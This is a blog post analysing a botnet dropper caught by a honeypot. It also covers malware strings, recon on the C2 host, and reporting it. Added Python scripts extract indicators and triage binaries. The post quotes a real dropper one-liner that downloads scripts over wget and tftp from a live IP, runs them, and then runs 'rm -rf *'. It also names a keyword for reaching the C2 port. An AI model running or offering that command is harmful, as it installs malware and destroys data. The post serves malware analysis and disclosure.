Hacking the Hackers: Taking Down a Live Botnet

Jacob Masse
Aug 22, 2024


It was a Wednesday afternoon when I decided to check the honeypot logs on my VPS. Oh no, a botnet has tried to infect the server! Let’s investigate, and get them back for all the servers they are infecting!

The payload can look a bit confusing, so let’s analyze it first.

“cd /tmp || cd /run || cd /; wget http://142.11.216.5/xxxbins.sh; chmod 777 xxxbins.sh; sh xxxbins.sh; tftp 142.11.216.5 -c get xxxtftp1.sh; chmod 777 xxxtftp1.sh; sh xxxtftp1.sh; tftp -r xxxtftp2.sh -g 142.11.216.5; chmod 777 xxxtftp2.sh; sh xxxtftp2.sh; rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh; rm -rf *”

First, it changes into /tmp, /run, or / (whichever works) and drops the malicious bash script there, so the malware is not easily found. Then, it grabs more files from the server (with wget and tftp), sets their permissions to 777, and runs them. Finally, it clears its tracks by running “rm -rf *”.

The bash files run different binaries for different types of systems.

The bash script gets more files from the botnet’s web server, sets execute permissions, runs them, and removes them. This tells us that the binary it runs must create another file or process to keep itself running; if it did not, the ‘rm -rf’ command would remove the infection.
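For a defender, the useful output of this analysis is the list of indicators the dropper hands you: the staging directories it tries, the hosts and URLs it pulls from, the files it executes, and whether it cleans up after itself. The following Python script is an added example (not code from the original post) that parses a captured dropper one-liner like the one above into that indicator list; the only input it needs is the payload string itself, which here is the one quoted above, and the command shapes it understands are the ones visible in that payload (cd fallbacks, wget, both tftp argument orders, sh, rm).

```python
import re
from urllib.parse import urlparse

# The dropper one-liner quoted above, embedded here as the sample input.
SAMPLE_PAYLOAD = (
    "cd /tmp || cd /run || cd /; wget http://142.11.216.5/xxxbins.sh; "
    "chmod 777 xxxbins.sh; sh xxxbins.sh; tftp 142.11.216.5 -c get xxxtftp1.sh; "
    "chmod 777 xxxtftp1.sh; sh xxxtftp1.sh; tftp -r xxxtftp2.sh -g 142.11.216.5; "
    "chmod 777 xxxtftp2.sh; sh xxxtftp2.sh; "
    "rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh; rm -rf *"
)

URL_RE = re.compile(r"https?://[^\s;'\"]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def split_commands(payload):
    """Split a shell one-liner on ';', '||' and '&&' into individual commands."""
    return [c.strip() for c in re.split(r"\s*(?:;|\|\||&&)\s*", payload) if c.strip()]


def extract_iocs(payload):
    """Walk the dropper's commands and collect the indicators a responder needs."""
    iocs = {
        "staging_dirs": [],      # directories the dropper tries, in order
        "hosts": set(),          # every host it talks to
        "urls": set(),           # HTTP download URLs
        "tftp_files": set(),     # files fetched over TFTP
        "executed": set(),       # scripts it runs
        "self_cleanup": False,   # does it wipe the working directory?
    }
    for cmd in split_commands(payload):
        argv = cmd.split()
        if not argv:
            continue
        if argv[0] == "cd" and len(argv) > 1:
            iocs["staging_dirs"].append(argv[1])
        elif argv[0] in ("wget", "curl"):
            for url in URL_RE.findall(cmd):
                iocs["urls"].add(url)
                iocs["hosts"].add(urlparse(url).hostname)
        elif argv[0] == "tftp":
            # Both client syntaxes seen in the payload:
            #   tftp HOST -c get FILE      and      tftp -r FILE -g HOST
            iocs["hosts"].update(IPV4_RE.findall(cmd))
            if "-c" in argv and "get" in argv:
                iocs["tftp_files"].add(argv[argv.index("get") + 1])
            if "-r" in argv:
                iocs["tftp_files"].add(argv[argv.index("-r") + 1])
        elif argv[0] in ("sh", "bash") and len(argv) > 1:
            iocs["executed"].add(argv[1])
        elif argv[0] == "rm" and "*" in argv:
            iocs["self_cleanup"] = True
    return iocs


def report(iocs):
    """Render the indicator set as plain lines suitable for a ticket or blocklist."""
    lines = ["staging dirs: " + " -> ".join(iocs["staging_dirs"])]
    lines += ["host: " + h for h in sorted(iocs["hosts"])]
    lines += ["url: " + u for u in sorted(iocs["urls"])]
    lines += ["tftp file: " + f for f in sorted(iocs["tftp_files"])]
    lines += ["executes: " + f for f in sorted(iocs["executed"])]
    lines.append("self-cleanup: " + ("yes" if iocs["self_cleanup"] else "no"))
    return lines


if __name__ == "__main__":
    for line in report(extract_iocs(SAMPLE_PAYLOAD)):
        print(line)
```

The "self-cleanup" flag is the point the paragraph above makes: when the dropper removes everything it downloaded, the persistence has to live in a spawned process, so the host list and file names are what you block and hunt for, not the scripts on disk.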

Brief Malware Analysis |

I’m not going to go too far on this topic since I want to highlight the scanning of the actual host, but I will go over this quickly.

The output of the ‘strings’ command

The file contained many user agents, which most likely means that the botnet is involved in Layer 7 attacks: the bot needs a pool of user agents to rotate through while flooding a website.

This is quite common in botnets. The group that made this botnet left its mark in the binary so that anyone who steals its source code just to show off still ends up crediting the original authors.

This one is interesting. I am guessing that it would be used for a type of DDoS method that bypasses CAPTCHAs shown by services like Cloudflare.

These are the attack vectors on the botnet; the last word was blurred for obvious reasons.

Brief Malware Analysis | 23

Here are some of the main details I obtained from the ‘23’ file.

This is really interesting because, as you can see, the files are ‘/dev/null’, which is basically the empty void on Linux. This might be a misconfiguration, or a bad actor who obtained the botnet from someone else, forgot to change the needed values, deployed it, and realized his mistake. This is pretty common in botnet findings; some payloads even include requests to local IPs!

Here is some encoded text that I decided to search on Google, and I found the source code for the binary!

https://raw.githubusercontent.com/USBBios/Mortem-qBot-Botnet-Src/main/bot.c

It turns out the random strings are used to send hex strings in an attack, which is meant to evade firewalls or “bypass” protections against that attack vector.
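The three observations above (a long list of user agents, ‘/dev/null’ where a path belongs, and hex-escaped payload strings) are exactly the kind of thing a quick ‘strings’ triage should flag automatically. The script below is an added example, not code from the post or from the bot source it links to: it pulls printable strings out of a binary blob the way ‘strings’ does and applies those three heuristics to produce a short verdict list. The binary it runs on is a constructed stand-in assembled inline (an ELF magic, three browser user agents, a ‘/dev/null’ path and one hex-escaped string), not the real sample from the FTP server.

```python
import re

# Constructed stand-in for the downloaded binary: just enough bytes to show
# what each heuristic keys on. Not the real sample.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 16
    + b"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\x00"
    + b"Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/115.0\x00"
    + b"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Safari/605.1.15\x00"
    + b"/dev/null\x00"
    + b"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\x00"
    + b"GET / HTTP/1.1\r\nHost: \x00"
    + b"\x01\x02\x03"
)

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")          # what `strings` prints by default
USER_AGENT = re.compile(r"^Mozilla/\d")                   # browser-style UA prefix
HEX_ESCAPED = re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}")    # literal "\xNN\xNN..." runs


def extract_strings(blob):
    """Return every run of 4+ printable ASCII bytes, like the `strings` tool."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(blob)]


def triage(blob, ua_threshold=3):
    """Apply the three observations from the analysis above as heuristics."""
    strings = extract_strings(blob)
    user_agents = [s for s in strings if USER_AGENT.match(s)]
    hex_blobs = [s for s in strings if HEX_ESCAPED.search(s)]
    null_paths = [s for s in strings if "/dev/null" in s]

    verdicts = []
    if len(user_agents) >= ua_threshold:
        verdicts.append(
            f"{len(user_agents)} User-Agent strings: likely Layer 7 (HTTP) flood capability"
        )
    if hex_blobs:
        verdicts.append(
            f"{len(hex_blobs)} hex-escaped strings: raw attack payloads / evasion data"
        )
    if null_paths:
        verdicts.append(
            "/dev/null used where a file path is expected: possible misconfigured rebuild"
        )
    return {
        "string_count": len(strings),
        "user_agents": user_agents,
        "hex_blobs": hex_blobs,
        "null_paths": null_paths,
        "verdicts": verdicts,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_BINARY)
    print(f"{result['string_count']} printable strings")
    for v in result["verdicts"]:
        print("-", v)
```

On a real sample you would feed the file's bytes in place of SAMPLE_BINARY; the user-agent threshold is deliberately a parameter, since a single UA string is ordinary for any HTTP client and only a long rotation list says anything about DDoS intent.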

I was right; the file must keep running on the system, receiving commands directly from the botnet.

The botnet was found on URLhaus.

Host Recon

Now, onto the fun part: host recon! We can start with an Nmap scan on ports 1–65535:

The command that I ran to start the scan

We see the anonymous FTP server that the binaries are fetched from, the SSH port, and the web server.

These ports interest me, especially 420. Bad actors can be very immature and pick ports like 420, 69, 42069, and so on.

Connecting

Port 777

Port 111 dropped the connection right away.

Port 420

I started typing random characters into the connection in hopes of finding something, and I got something.

I noticed that whenever I typed something and pressed Enter, it was erased. I got the idea that this might be an evasion method to make people think there was no service on the port, which would mean there was some keyword that the botnet master knew to connect with. I tried words like “attack”, “password”, “open” and “ddos”. But then, I tried “login”:

Boom.

The End

Hacking back is unethical and illegal. Instead of actually “hacking” the botnet (contrary to the title), I took all of these findings and reported them to the hosting provider and the authorities, and they promptly took the botnet, and all of the malware hosted on the FTP server, offline. I also forwarded the IOCs from the malware to a few malware analyst friends and added them to VirusTotal to aid future decisions.
